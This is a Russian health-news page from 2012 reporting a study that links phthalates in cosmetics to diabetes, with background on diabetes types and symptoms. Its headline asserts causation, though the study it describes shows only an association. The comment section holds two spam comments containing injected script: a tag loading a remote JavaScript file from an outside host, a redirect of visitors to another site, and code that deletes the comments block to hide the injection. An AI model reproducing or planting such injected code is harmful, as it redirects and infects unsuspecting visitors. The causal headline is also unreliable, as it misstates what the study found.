Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Косметика вызывает диабет  >>  Косметика вызывает диабет
 
Обратная связь
 

Косметика вызывает диабет

Размер шрифта
05 сентября 2012 00:00
Юрий Малышев
Здоровье инфо
Анна Белевская
Здоровье инфо
  • google_analytics: false
  • Нравится

Американские ученые установили, что использование различных косметических средств, в состав которых входят фталаты, приводит к развитию сахарного диабета.

косметика

Что такое сахарный диабет

Сахарный диабет – это заболевание, при котором наблюдается стойкое повышение уровня глюкозы в крови.

Выделяют сахарный диабет 1 типа и сахарный диабет 2 типа. При сахарном диабете 1 типа происходит разрушение клеток поджелудочной железы, в которых образуется инсулин. Инсулин необходим нашему организму для снижения уровня глюкозы в крови. Оставшиеся клетки поджелудочной железы не могут удовлетворить потребности организма в инсулине, поэтому большая часть глюкозы не поступает в клетки, а остается в крови.

При сахарном диабете 2 типа клетки поджелудочной железы не страдают, и в организме находится достаточное количество инсулина. Однако может развиться так называемая инсулинорезистентность, когда клетки теряют чувствительность к инсулину. Представьте, что инсулин – это ключик, который открывает клетку для глюкозы, при инсулинорезистентности ключик не подходит к замку и не может открыть клетку. В результате глюкоза не поступает в клетки и остается в крови.

Симптомы

К основным симптомам сахарного диабета относятся:

  • Учащенное обильное мочеиспускание, в т.ч. в ночное время, которое связано с появлением в моче глюкозы (в норме глюкоза в моче отсутствует).
  • Постоянная жажда, которая появляется в результате потери жидкости с мочой.
  • Повышенный аппетит, который вызван нарушением углеводного обмена – неспособность клеток поглощать и перерабатывать глюкозу.
  • Похудание, которое обусловлено расщеплением белков и жиров в результате того, что клетки не могут использовать глюкозу для производства энергии.

Суть исследования

В исследовании приняли участие 2350 женщин. Оказалось, что риск развития сахарного диабета у женщин с самым высоким содержанием фталатов в моче был в 2 раза выше, чем у женщин с самым низким содержанием фталатов. Если содержание фталатов в моче было выше среднего уровня, то риск развития сахарного диабета увеличивался на 60%.

Результаты

Данное исследование позволило установить связь между фталатами и сахарным диабетом. Помимо того, что фталаты находятся в составе различных косметических средств (лаки для ногтей, мыло, увлажняющие кремы, духи), их также можно обнаружить в некоторых медицинских устройствах и лекарственных препаратах, которые используются для лечения сахарного диабета. Вот почему у женщин с сахарным диабетом повышен уровень содержания фталатов.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 21:31

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 23:36

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Всего две инъекции антител вылечат сахарный диабет!   Что влияет на показатели сахара?   Высокий сахар в крови приводит к старческому слабоумию   Если вы лечите диабет – будете умнее!  
04 сентября 2012Косметика вызывает диабет! 28 августа 2012Если вы лечите диабет – будете умнее!
 
13 августа 2012Всего две инъекции антител вылечат сахарный диабет! 31 июля 2012Сахарный диабет можно вылечить с помощью одного укола!
 

Слайдшоу

1
Лучшая и худшая еда для диабета. Часть 2
Сахар – это наркотик?
Как побороть зависимость от сахара

Тесты

1
Есть ли у вас скрытый риск диабета?
Оцените риск развития сахарного диабета
Что вы знаете о поджелудочной железе?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.